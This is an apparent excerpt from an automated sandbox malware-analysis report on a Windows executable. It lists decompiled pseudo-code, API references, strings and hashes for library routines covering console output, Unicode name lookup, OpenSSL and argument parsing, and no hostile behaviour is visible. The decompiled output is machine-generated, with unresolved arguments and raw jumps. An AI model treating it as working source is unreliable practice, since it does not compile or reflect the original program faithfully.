				if (_t99 - 1 - 1 > 0) goto 0xda8ec41e;
				if (( !r14d & 0x00000001) == 0) goto 0xda8ec3b0;
				if (( *( *((intOrPtr*)(0xda91ca20 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0xda8ec434;
				_t23 = _t196 + 2; // 0x2
				r8d = _t23;
				0xda8eb740();
				_v112 = _t204;
				if (E00007FF77FF7DA8F298C(r15d, __ecx) == 0) goto 0xda8ec563;
				if ( *( *((intOrPtr*)(0xda91ca20 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0xda8ec563;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0xda8ec473;
				E00007FF77FF7DA8E3970( *((intOrPtr*)(0xda91ca20 + _t220 * 8)), __r9, __r9, _t205);
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t204) goto 0xda8ec48f;
				_t179 =  *((intOrPtr*)(0xda91ca20 + _t220 * 8));
				if ( *((intOrPtr*)(_t179 + 0x39 + _t223 * 8)) == dil) goto 0xda8ec563;
				if (GetConsoleMode(??, ??) == 0) goto 0xda8ec55c;
				_t127 = _v136;
				_t158 = _t127;
				if (_t158 == 0) goto 0xda8ec539;
				if (_t158 == 0) goto 0xda8ec4c4;
				if (_t127 - 1 != 1) goto 0xda8ec5fd;
				_t221 = _t205 + _t224;
				_v128 = _t204;
				_t226 = _t205;
				if (_t205 - _t221 >= 0) goto 0xda8ec530;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E00007FF77FF7DA8F2A58( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0xda8ec527;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0xda8ec51c;
				if (E00007FF77FF7DA8F2A58(0xd) != 0xd) goto 0xda8ec527;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0xda8ec530;
				goto 0xda8ec4d8;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0xda8ec5f3;
				r9d = r14d;
				_v152 = __r9;
				E00007FF77FF7DA8EB9C0(_t109, r15d, __esi, __r9,  &_v128,  &_v96, _t205);
				asm("movsd xmm0, [eax]");
				goto 0xda8ec5f8;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0xda8ec5c0;
				_t133 = _v136;
				_t166 = _t133;
				if (_t166 == 0) goto 0xda8ec5ac;
				if (_t166 == 0) goto 0xda8ec598;
				if (_t133 - 1 != 1) goto 0xda8ec604;
				r9d = r14d;
				E00007FF77FF7DA8EBF3C(_t122, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r9d = r14d;
				E00007FF77FF7DA8EC058(r15d,  *((intOrPtr*)(_t179 + 8)), _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r9d = r14d;
				E00007FF77FF7DA8EBE38(_t122, _t133 - 1, r15d, _t179, _t183,  &_v128, _t207, _t205, _t217, _t218);
				goto 0xda8ec550;
				r8d = r14d;
				_v152 = _v152 & _t179;
				_v128 = _t179;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0xda8ec5f0;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0xda8ec66c;
				_t117 = _v112;
				if (_t117 == 0) goto 0xda8ec643;
				if (_t117 != 5) goto 0xda8ec633;
				 *((char*)(_t183 + 0x30)) = 1;
				 *((intOrPtr*)(_t183 + 0x2c)) = 9;
				 *((char*)(_t183 + 0x38)) = 1;
				 *(_t183 + 0x34) = _t117;
				goto 0xda8ec3df;
				_t203 = _t183;
				E00007FF77FF7DA8E4350(_v112, _t203);
				goto 0xda8ec3df;
				if (( *( *((intOrPtr*)(_t203 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0xda8ec654;
				if ( *_t205 == 0x1a) goto 0xda8ec673;
				 *(_t183 + 0x34) =  *(_t183 + 0x34) & 0x00000000;
				 *((char*)(_t183 + 0x30)) = 1;
				 *((intOrPtr*)(_t183 + 0x2c)) = 0x1c;
				 *((char*)(_t183 + 0x38)) = 1;
				goto 0xda8ec3df;
				goto 0xda8ec675;
				return 0;
			}

0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec380
0x7ff7da8ec396
0x7ff7da8ec39c
0x7ff7da8ec39f
0x7ff7da8ec3a5
0x7ff7da8ec3ae
0x7ff7da8ec3b0
0x7ff7da8ec3b5
0x7ff7da8ec3b8
0x7ff7da8ec3be
0x7ff7da8ec3c5
0x7ff7da8ec3cd
0x7ff7da8ec3d0
0x7ff7da8ec3d5
0x7ff7da8ec3da
0x7ff7da8ec3e2
0x7ff7da8ec3f7
0x7ff7da8ec3fb
0x7ff7da8ec3ff
0x7ff7da8ec407
0x7ff7da8ec40c
0x7ff7da8ec413
0x7ff7da8ec41c
0x7ff7da8ec424
0x7ff7da8ec42b
0x7ff7da8ec42b
0x7ff7da8ec42f
0x7ff7da8ec437
0x7ff7da8ec449
0x7ff7da8ec458
0x7ff7da8ec462
0x7ff7da8ec467
0x7ff7da8ec47e
0x7ff7da8ec480
0x7ff7da8ec489
0x7ff7da8ec4a4
0x7ff7da8ec4aa
0x7ff7da8ec4ae
0x7ff7da8ec4b0
0x7ff7da8ec4b9
0x7ff7da8ec4be
0x7ff7da8ec4c4
0x7ff7da8ec4c8
0x7ff7da8ec4cc
0x7ff7da8ec4d2
0x7ff7da8ec4d4
0x7ff7da8ec4df
0x7ff7da8ec4e3
0x7ff7da8ec4e8
0x7ff7da8ec4ef
0x7ff7da8ec4f1
0x7ff7da8ec4f5
0x7ff7da8ec4fd
0x7ff7da8ec511
0x7ff7da8ec513
0x7ff7da8ec516
0x7ff7da8ec523
0x7ff7da8ec525
0x7ff7da8ec52d
0x7ff7da8ec530
0x7ff7da8ec534
0x7ff7da8ec539
0x7ff7da8ec53c
0x7ff7da8ec54b
0x7ff7da8ec550
0x7ff7da8ec557
0x7ff7da8ec56c
0x7ff7da8ec56e
0x7ff7da8ec572
0x7ff7da8ec574
0x7ff7da8ec579
0x7ff7da8ec57e
0x7ff7da8ec584
0x7ff7da8ec591
0x7ff7da8ec596
0x7ff7da8ec598
0x7ff7da8ec5a5
0x7ff7da8ec5aa
0x7ff7da8ec5ac
0x7ff7da8ec5b9
0x7ff7da8ec5be
0x7ff7da8ec5cb
0x7ff7da8ec5ce
0x7ff7da8ec5d6
0x7ff7da8ec5da
0x7ff7da8ec5e5
0x7ff7da8ec5e7
0x7ff7da8ec5ed
0x7ff7da8ec5f3
0x7ff7da8ec5f8
0x7ff7da8ec60e
0x7ff7da8ec610
0x7ff7da8ec615
0x7ff7da8ec61a
0x7ff7da8ec61c
0x7ff7da8ec620
0x7ff7da8ec627
0x7ff7da8ec62b
0x7ff7da8ec62e
0x7ff7da8ec636
0x7ff7da8ec639
0x7ff7da8ec63e
0x7ff7da8ec64d
0x7ff7da8ec652
0x7ff7da8ec654
0x7ff7da8ec658
0x7ff7da8ec65c
0x7ff7da8ec663
0x7ff7da8ec667
0x7ff7da8ec671
0x7ff7da8ec685

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7DA8EC36B), ref: 00007FF7DA8EC49C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7DA8EC36B), ref: 00007FF7DA8EC527

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 866ede3298fa327e1352ae7a751efdd83158b4407a9a6bcee0e24f0a144bec6f
Instruction ID: 35ffa1d46ce3754681518a236350748ea23c3f3e22c6dc510897bc2ab61ea3d4
Opcode Fuzzy Hash: 866ede3298fa327e1352ae7a751efdd83158b4407a9a6bcee0e24f0a144bec6f
Instruction Fuzzy Hash: 039125B2F08652C5F712AF2584402BDABA0BB64B88FD441BBDE0E53696CF3DD552C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD742010 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFC7FFCFD742010(long long __rbx, void* __rcx, void* __rdx, long long __r9, long long _a24, signed int _a40) {
				signed int _v72;
				char _v344;
				long long _v360;
				intOrPtr _v392;
				void* __rsi;
				void* __rbp;
				void* _t46;
				signed long long _t55;
				signed long long _t56;
				long long _t59;
				long long _t73;
				void* _t74;
				void* _t75;
				signed long long _t76;
				signed int _t87;
				signed long long _t89;

				_t59 = __rbx;
				_a24 = __rbx;
				_t76 = _t75 - 0x170;
				_t55 =  *0xfd84f008; // 0xda4bfe61f88d
				_t56 = _t55 ^ _t76;
				_v72 = _t56;
				_t87 = r8d;
				_v360 = __r9;
				r8d = 0x10;
				_t73 = __r9;
				if (strncmp(??, ??, ??) == 0) goto 0xfd743c20;
				r8d = 0x16;
				if (strncmp(??, ??, ??) == 0) goto 0xfd743cff;
				_t46 = r13d;
				if (_t46 <= 0) goto 0xfd7420ce;
				if (_t46 == 0) goto 0xfd7420c6;
				if (_t56 + 1 - _t87 < 0) goto 0xfd7420a0;
				r15d =  !(( *(__rdx + __imp___Py_ctype_toupper) & 0x000000ff ^ ( *(__rdx + __imp___Py_ctype_toupper) & 0x000000ff & 0xff000000) >> 0x00000018) & 0x00ffffff) & 0x0000ffff;
				_t43 =  *((intOrPtr*)(0xfd7adcf0 + _t89 * 4));
				if ( *((intOrPtr*)(0xfd7adcf0 + _t89 * 4)) == 0) goto 0xfd7421f5;
				r9d = 0x100;
				_v392 = 1;
				if (E00007FFC7FFCFD742210( *((intOrPtr*)(0xfd7adcf0 + _t89 * 4)), __rbx, __rcx, "CJK UNIFIED IDEOGRAPH-", __r9, _t74,  &_v344) == 0) goto 0xfd742189;
				if (r13d <= 0) goto 0xfd742144;
				r8d =  *( &_v344 + __imp___Py_ctype_toupper) & 0x000000ff;
				if (r8d !=  *((char*)( &_v344 + _t59))) goto 0xfd742189;
				if (_t59 + 1 - _t87 < 0) goto 0xfd742121;
				if ( *((char*)(_t76 + _t87 + 0x50)) != 0) goto 0xfd742189;
				r8d = _a40;
				return E00007FFC7FFCFD7427A0(E00007FFC7FFCFD742400( *((intOrPtr*)(0xfd7adcf0 + _t89 * 4)), __rcx, _t73), _t43, _v72 ^ _t76);
			}

0x7ffcfd742010
0x7ffcfd742010
0x7ffcfd742020
0x7ffcfd742027
0x7ffcfd74202e
0x7ffcfd742031
0x7ffcfd74203c
0x7ffcfd742042
0x7ffcfd742051
0x7ffcfd742057
0x7ffcfd742062
0x7ffcfd742068
0x7ffcfd742082
0x7ffcfd74208a
0x7ffcfd74208d
0x7ffcfd7420b9
0x7ffcfd7420cc
0x7ffcfd7420d9
0x7ffcfd7420dd
0x7ffcfd7420e3
0x7ffcfd7420e9
0x7ffcfd7420ef
0x7ffcfd742108
0x7ffcfd74210d
0x7ffcfd74212e
0x7ffcfd74213a
0x7ffcfd742142
0x7ffcfd74214a
0x7ffcfd74214c
0x7ffcfd742188

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD74205A
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD742078

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFCFD74206E
HANGUL SYLLABLE , xrefs: 00007FFCFD74204A

Memory Dump Source

Source File: 00000001.00000002.331105965.00007FFCFD741000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFCFD740000, based on PE: true

Associated: 00000001.00000002.331093235.00007FFCFD740000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD746000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7A4000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD7F3000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331244968.00007FFCFD84C000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331709311.00007FFCFD84F000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.331736095.00007FFCFD851000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd740000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strncmp
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 1114863663-87138338
Opcode ID: f9062e7cd48a9c9a86cd9813eff79ab4e0bc535cd0efc74b2f7439f49aa03786
Instruction ID: 947f2aff03540ec4fc4ca11a5a16bcad809e7c64efb740cfbe102fb4d4e575a5
Opcode Fuzzy Hash: f9062e7cd48a9c9a86cd9813eff79ab4e0bc535cd0efc74b2f7439f49aa03786
Instruction Fuzzy Hash: 46816D32608AAAC6E7258B1598606BAF751FB46749F400133DB6E4B6CCEF3DD415C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD86153C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFCFD96F975
memmove.VCRUNTIME140 ref: 00007FFCFD96FA23
memmove.VCRUNTIME140 ref: 00007FFCFD96FAAD

Strings

..\s\crypto\ct\ct_oct.c, xrefs: 00007FFCFD96F8A5, 00007FFCFD96F99D, 00007FFCFD96F9BB, 00007FFCFD96FA37, 00007FFCFD96FA53, 00007FFCFD96FA7D, 00007FFCFD96FA95

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\ct\ct_oct.c
API String ID: 2162964266-1972679481
Opcode ID: a7b3a4ca31958b792802e320a1a90a1b67396cf0767f730d082d836c556153cf
Instruction ID: 118d2c1383a1b1cbff65d7c3ed56b6cbc5a26f2291ffcea741b1d965f4fe0ffb
Opcode Fuzzy Hash: a7b3a4ca31958b792802e320a1a90a1b67396cf0767f730d082d836c556153cf
Instruction Fuzzy Hash: 2E71D66260D6A989E715CF6580201BCBB70EB55F48F144232EEAD037C6FE2DD65AC7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD913670 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 155stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD913733
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD91374B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFD913768

Strings

content-type, xrefs: 00007FFCFD91367A

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strncmp
String ID: content-type
API String ID: 1114863663-3266185539
Opcode ID: 23c524c28c8597e3cfd1575776d6829749d509832690984e05b94f6b4c445134
Instruction ID: ce33d23901fc524f856179bd0d51bc3539bc35035965a8c905f43a0ab3cee316
Opcode Fuzzy Hash: 23c524c28c8597e3cfd1575776d6829749d509832690984e05b94f6b4c445134
Instruction Fuzzy Hash: C651F652B1C56A41FB20A796946037AE7B1AF44BA4F051238ED7D47BC5FE2CE605C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7DA8D1FA4
SetWindowLongPtrW.USER32 ref: 00007FF7DA8D1FC6
GetWindowLongPtrW.USER32 ref: 00007FF7DA8D1FF0
InvalidateRect.USER32 ref: 00007FF7DA8D2010

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
Instruction ID: cce63523b37562e1ed21a6ef47c86d7ad9f81d523b7969d044a97034b57c0e1a
Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
Instruction Fuzzy Hash: 6511C621E1814346FA56A76AE5442BDD292FFD9791FC88072ED4906BCBDE2CD4A18310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F4C8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF7DA8F4C8C(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __r8, void* __r9, void* __r10, long long _a8, long long _a16) {
				char _v16;
				intOrPtr _v32;
				char _v40;
				signed long long _v48;
				signed long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* _t28;
				void* _t29;
				long long _t57;

				_t29 = __ebx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t57 = __r8;
				if (E00007FF77FF7DA8F07F0(__rax, __r9, __rdx, __rdx, __r8, __rcx, __r9) != 0) goto 0xda8f4d59;
				E00007FF77FF7DA8E496C(__rax, __r9,  &_v40, __rdx, __r8);
				if ( *((intOrPtr*)(_v32 + 0xc)) != 0xfde9) goto 0xda8f4cec;
				if (_v16 == 0) goto 0xda8f4d23;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0xda8f4d23;
				_t28 = E00007FF77FF7DA8EDF1C(_v16, _v40);
				if (_t28 != 0) goto 0xda8f4d0e;
				if (_v16 == _t28) goto 0xda8f4d07;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				goto 0xda8f4d23;
				if (_v16 == 0) goto 0xda8f4d21;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				_v48 = _v48 & 0x00000000;
				r9d = _t29;
				_v56 = _v56 & 0x00000000;
				_v64 = 0x3f;
				_v72 = _t57;
				E00007FF77FF7DA8EF008();
				return _t28;
			}

APIs

Part of subcall function 00007FF7DA8F07F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F0823

_get_daylight.LIBCMT ref: 00007FF7DA8F4DA4
_get_daylight.LIBCMT ref: 00007FF7DA8F4DB5

Strings

?, xrefs: 00007FF7DA8F4D35

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: f58b13cede135560bdf6ee0e5db3f19b88cd01c01375eb69c3fd42c2923875b2
Instruction ID: c4faeeb689ebf7bc036577efb97a5ab3b36e216536f72d62141b9da85c6d4634
Opcode Fuzzy Hash: f58b13cede135560bdf6ee0e5db3f19b88cd01c01375eb69c3fd42c2923875b2
Instruction Fuzzy Hash: A241E512A0928745FB26BB25A40137DEA60FBA07A4FD04277EE5C06ADBDF3DD4618710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E7DBC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FF77FF7DA8E7DBC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t30;
				intOrPtr _t36;
				intOrPtr _t42;
				intOrPtr* _t65;
				long long _t71;
				void* _t73;
				long long _t87;
				signed int _t88;
				intOrPtr* _t89;
				void* _t99;

				_t73 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0xda8e7f2b;
				_t2 = _t73 - 1; // -1
				if (_t2 - 1 <= 0) goto 0xda8e7dfa;
				E00007FF77FF7DA8E4394(__rax);
				_t3 = _t88 + 0x16; // 0x16
				_t42 = _t3;
				 *__rax = _t42;
				E00007FF77FF7DA8E9D00();
				goto 0xda8e7f2b;
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t89 =  *0xda91c768; // 0x17ac75422ea
				 *0xda91c740 = 0xda91c790;
				if (_t89 == 0) goto 0xda8e7e2a;
				if ( *_t89 != _t42) goto 0xda8e7e2d;
				_t65 =  &_a32;
				_a24 = _t88;
				_v56 = _t65;
				r8d = 0;
				_a32 = _t88;
				_t30 = E00007FF77FF7DA8E7BB8(0xda91c790, 0xda91c790, 0xda91c790, _t88, 0xda91c790, __r8,  &_a24, _t99);
				r8d = 2;
				E00007FF77FF7DA8E7D5C(_t30, _a24, _a32, __r8);
				_t71 = _t65;
				if (_t65 != 0) goto 0xda8e7e85;
				E00007FF77FF7DA8E4394(_t65);
				 *_t65 = 0xc;
				E00007FF77FF7DA8E9D68(_t65, _a24);
				goto 0xda8e7df3;
				_v56 =  &_a32;
				E00007FF77FF7DA8E7BB8(_t71, 0xda91c790, _t71, _t88, 0xda91c790, _t65 + _a24 * 8,  &_a24, _t99);
				if (r14d != 1) goto 0xda8e7ebd;
				_t36 = _a24 - 1;
				 *0xda91c758 = _t71;
				 *0xda91c748 = _t36;
				goto 0xda8e7f26;
				_a16 = _t88;
				0xda8f0e7c();
				if (_t36 == 0) goto 0xda8e7eec;
				E00007FF77FF7DA8E9D68( &_a32, _a16);
				_a16 = _t88;
				E00007FF77FF7DA8E9D68( &_a32, _t71);
				goto 0xda8e7f2b;
				_t87 = _a16;
				if ( *_t87 == _t88) goto 0xda8e7f07;
				if ( *((intOrPtr*)(_t87 + 8)) != _t88) goto 0xda8e7efb;
				 *0xda91c748 = 0;
				_a16 = _t88;
				 *0xda91c758 = _t87;
				E00007FF77FF7DA8E9D68(_t87 + 8, _t88 + 1);
				_a16 = _t88;
				E00007FF77FF7DA8E9D68(_t87 + 8, _t71);
				return _t36;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E7DEE

Part of subcall function 00007FF7DA8E9D68: HeapFree.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7DA8DADC5), ref: 00007FF7DA8E7E0C

Strings

C:\Users\user\Desktop\4Vp6Xc8SFr.exe, xrefs: 00007FF7DA8E7DFA

Memory Dump Source

